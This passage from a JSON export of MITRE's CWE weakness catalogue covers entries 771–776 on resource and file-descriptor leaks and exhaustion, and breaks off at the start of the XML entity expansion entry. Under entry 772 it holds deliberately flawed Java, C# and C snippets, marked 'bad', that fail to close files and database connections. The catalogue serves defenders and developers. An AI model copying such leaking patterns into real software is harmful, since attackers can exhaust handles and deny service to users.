Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"771":{"attr":{"@_ID":"771","@_Name":"Missing Reference to Active Allocated Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed.","Extended_Description":"This does not necessarily apply in languages or frameworks that automatically perform garbage collection, since the removal of all references may act as a signal that the resource is ready to be reclaimed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"772":{"attr":{"@_ID":"772","@_Name":"Missing Release of Resource after Effective Lifetime","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.","Extended_Description":"When a resource is not released after use, it can allow attackers to cause a denial of service by causing the allocation of resources without triggering their release. Frequently-affected resources include memory, CPU, disk space, power or battery, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free resources in a function. If you allocate resources that you intend to free upon completion of the function, you must be sure to free the resources at all exit points for that function including error conditions."},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"Intro_Text":"The following code attempts to open a new connection to a database, process the results returned by the database, and close the allocated SqlConnection object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();","xhtml:br":["","","","","",""]}},"Body_Text":"The problem with the above code is that if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2009-2858","Description":"Chain: memory leak (CWE-404) leads to resource exhaustion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-2122","Description":"Port scan triggers CPU consumption with processes that attempt to read data from closed sockets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122"},{"Reference":"CVE-2007-4103","Description":"Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-772"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-772"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"469"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-772"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-772"}}]},"Notes":{"Note":[{"#text":"\\"Resource exhaustion\\" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain.","attr":{"@_Type":"Maintenance"}},{"#text":"Vulnerability theory is largely about how behaviors and resources interact. \\"Resource exhaustion\\" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"773":{"attr":{"@_ID":"773","@_Name":"Missing Reference to Active File Descriptor or Handle","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"771","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}]}},"774":{"attr":{"@_ID":"774","@_Name":"Allocation of File Descriptors or Handles Without Limits or Throttling","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor.","Extended_Description":"This can cause the software to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"770","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"File Descriptor Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"When allocating resources without limits, an attacker could prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP13","Entry_Name":"Unrestricted Consumption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;Resource Limits&#34;, Page 574"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"775":{"attr":{"@_ID":"775","@_Name":"Missing Release of File Descriptor or Handle after Effective Lifetime","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed.","Extended_Description":"When a file descriptor or handle is not released after use (typically by explicitly closing it), attackers can cause a denial of service by consuming all available file descriptors/handles, or otherwise preventing other system processes from obtaining their own file descriptors/handles.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"772","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0897","Description":"Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, &#34;File Descriptor Leaks&#34;, Page 582"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"776":{"attr":{"@_ID":"776","@_Name":"Improper Restriction of Recursive Entity References in DTDs (\'XML Entity Expansion\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities.","Extended_Description":"If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"674","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"409","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"XML","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"XEE","Description":"XEE is the acronym commonly used for XML Entity 